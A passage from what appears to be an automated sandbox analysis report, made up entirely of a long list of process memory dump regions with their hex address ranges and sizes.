                                                                                                                        48KB

                                                                                                                      • memory/836-256-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/836-170-0x00000000000F0000-0x00000000000FD000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        52KB

                                                                                                                      • memory/836-168-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/876-230-0x0000000000930000-0x000000000097B000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        300KB

                                                                                                                      • memory/876-97-0x0000000002B30000-0x0000000002BA0000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        448KB

                                                                                                                      • memory/876-96-0x00000000008E0000-0x000000000092B000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        300KB

                                                                                                                      • memory/876-231-0x00000000019B0000-0x0000000001A20000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        448KB

                                                                                                                      • memory/920-104-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/920-107-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        172KB

                                                                                                                      • memory/920-313-0x00000000048C2000-0x00000000048C3000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/920-312-0x00000000048C0000-0x00000000048C1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/920-248-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/964-225-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1004-294-0x0000000004AD2000-0x0000000004AD3000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1004-293-0x0000000004AD0000-0x0000000004AD1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1036-311-0x00000000012D2000-0x00000000012D3000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1036-310-0x00000000012D0000-0x00000000012D1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1164-252-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1208-146-0x0000000000340000-0x0000000000342000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/1208-140-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1212-277-0x0000000002C00000-0x0000000002C17000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        92KB

                                                                                                                      • memory/1232-125-0x0000000002170000-0x0000000002172000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/1232-122-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1280-120-0x00000000004A0000-0x0000000000510000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        448KB

                                                                                                                      • memory/1280-119-0x0000000000060000-0x00000000000AB000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        300KB

                                                                                                                      • memory/1280-128-0x0000000002770000-0x0000000002871000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.0MB

                                                                                                                      • memory/1280-118-0x00000000FF4A246C-mapping.dmp
                                                                                                                      • memory/1288-66-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1392-202-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1492-314-0x00000000051E0000-0x00000000051E1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1568-267-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1576-174-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1608-130-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1608-133-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        88KB

                                                                                                                      • memory/1640-194-0x00000000005A5000-0x00000000005A6000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1640-153-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1640-190-0x000000001B0A0000-0x000000001B0B9000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        100KB

                                                                                                                      • memory/1640-161-0x000007FEF2B60000-0x000007FEF3BF6000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        16.6MB

                                                                                                                      • memory/1640-163-0x0000000000580000-0x0000000000582000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/1640-193-0x0000000000586000-0x00000000005A5000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        124KB

                                                                                                                      • memory/1680-84-0x0000000000580000-0x0000000000581000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1680-83-0x0000000000560000-0x000000000057C000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        112KB

                                                                                                                      • memory/1680-82-0x0000000000550000-0x0000000000551000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1680-94-0x000000001AF50000-0x000000001AF52000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/1680-80-0x00000000011A0000-0x00000000011A1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1680-76-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1696-263-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1840-91-0x0000000010000000-0x0000000010002000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/1840-92-0x00000000002E0000-0x00000000003E1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.0MB

                                                                                                                      • memory/1840-93-0x00000000005C0000-0x000000000061C000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        368KB

                                                                                                                      • memory/1840-70-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1884-111-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/1884-117-0x0000000000240000-0x0000000000241000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1972-144-0x0000000000240000-0x0000000000241000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/1972-145-0x00000000747C1000-0x00000000747C3000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/1972-135-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2060-195-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2060-177-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2064-232-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2084-269-0x0000000000402F68-mapping.dmp
                                                                                                                      • memory/2084-268-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        48KB

                                                                                                                      • memory/2096-254-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2104-178-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2132-219-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2152-247-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2160-180-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2180-244-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2196-188-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2208-183-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2212-257-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2256-213-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2264-296-0x0000000002280000-0x0000000002ECA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        12.3MB

                                                                                                                      • memory/2264-204-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2264-295-0x0000000002280000-0x0000000002ECA000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        12.3MB

                                                                                                                      • memory/2268-235-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2288-255-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2296-309-0x00000000047D2000-0x00000000047D3000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2296-308-0x00000000047D0000-0x00000000047D1000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2324-217-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2332-303-0x00000000006A0000-0x00000000006CE000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        184KB

                                                                                                                      • memory/2332-304-0x00000000006A0000-0x00000000006CE000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        184KB

                                                                                                                      • memory/2408-243-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2448-245-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2456-220-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2472-259-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2480-210-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2484-186-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2496-233-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2544-299-0x0000000004B20000-0x0000000004B21000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2544-300-0x0000000004B22000-0x0000000004B23000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2588-191-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2592-315-0x0000000004970000-0x0000000004971000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2604-222-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2628-197-0x000007FEF2B60000-0x000007FEF3BF6000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        16.6MB

                                                                                                                      • memory/2628-198-0x0000000000170000-0x0000000000172000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/2628-196-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2676-240-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2712-227-0x0000000010000000-0x0000000010002000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/2712-229-0x00000000009C0000-0x0000000000A1C000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        368KB

                                                                                                                      • memory/2712-228-0x0000000000820000-0x0000000000921000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        1.0MB

                                                                                                                      • memory/2712-223-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2720-292-0x0000000001DF0000-0x0000000002A3A000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        12.3MB

                                                                                                                      • memory/2720-291-0x0000000001DF0000-0x0000000002A3A000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        12.3MB

                                                                                                                      • memory/2732-201-0x0000000000570000-0x0000000000571000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2732-199-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2732-200-0x000007FEFC381000-0x000007FEFC383000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        8KB

                                                                                                                      • memory/2744-241-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2812-302-0x0000000004912000-0x0000000004913000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2812-301-0x0000000004910000-0x0000000004911000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2832-250-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2852-246-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2864-265-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2864-273-0x0000000000200000-0x0000000000201000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2936-287-0x0000000006110000-0x0000000006111000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2936-284-0x0000000005260000-0x0000000005261000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2936-279-0x0000000000C90000-0x0000000000C91000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2936-280-0x0000000004990000-0x0000000004991000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2936-281-0x0000000004950000-0x0000000004951000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2936-290-0x000000007EF30000-0x000000007EF31000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2936-282-0x0000000004952000-0x0000000004953000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2936-283-0x0000000002620000-0x0000000002621000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2948-305-0x0000000000970000-0x0000000000971000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2948-238-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2976-205-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/2976-208-0x0000000000160000-0x00000000001FD000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        628KB

                                                                                                                      • memory/3012-209-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3016-237-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3036-215-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/3056-307-0x0000000002540000-0x000000000318A000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        12.3MB

                                                                                                                      • memory/3056-306-0x0000000002540000-0x000000000318A000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        12.3MB